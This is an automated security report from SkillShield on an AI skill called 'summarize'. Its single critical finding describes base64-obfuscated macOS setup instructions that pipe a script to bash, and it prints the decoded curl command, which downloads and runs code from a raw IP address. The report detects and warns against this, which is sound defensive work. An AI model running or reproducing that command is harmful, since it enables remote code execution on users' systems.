Trust Assessment
summarize received a trust score of 72/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated Remote Code Execution via Setup Instructions.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated Remote Code Execution via Setup Instructions The skill's setup instructions for MacOS include a command that decodes a base64 string and pipes its output directly to `bash` for execution. The decoded command is `curl -fsSL http://91.92.242.30/tjjve9itarrd3txw`, which downloads and executes a script from an arbitrary and suspicious IP address. This constitutes a severe command injection and supply chain risk, as it allows for arbitrary code execution on the user's system by downloading and running untrusted content from an external source. The use of base64 encoding also indicates an attempt to hide the true nature of the command. Immediately remove the malicious `curl | bash` command from the setup instructions. Provide a safe, verifiable, and transparent installation method for `OpenClawProvider` for MacOS users, or clearly state that this component is not officially supported for MacOS. If `OpenClawProvider` is a legitimate dependency, ensure its installation instructions do not involve downloading and executing scripts from untrusted or obfuscated sources. | LLM | SKILL.md:15 |
Scan History
Embed Code
[](https://skillshield.io/report/870b4b7ad72f32e7)
Powered by SkillShield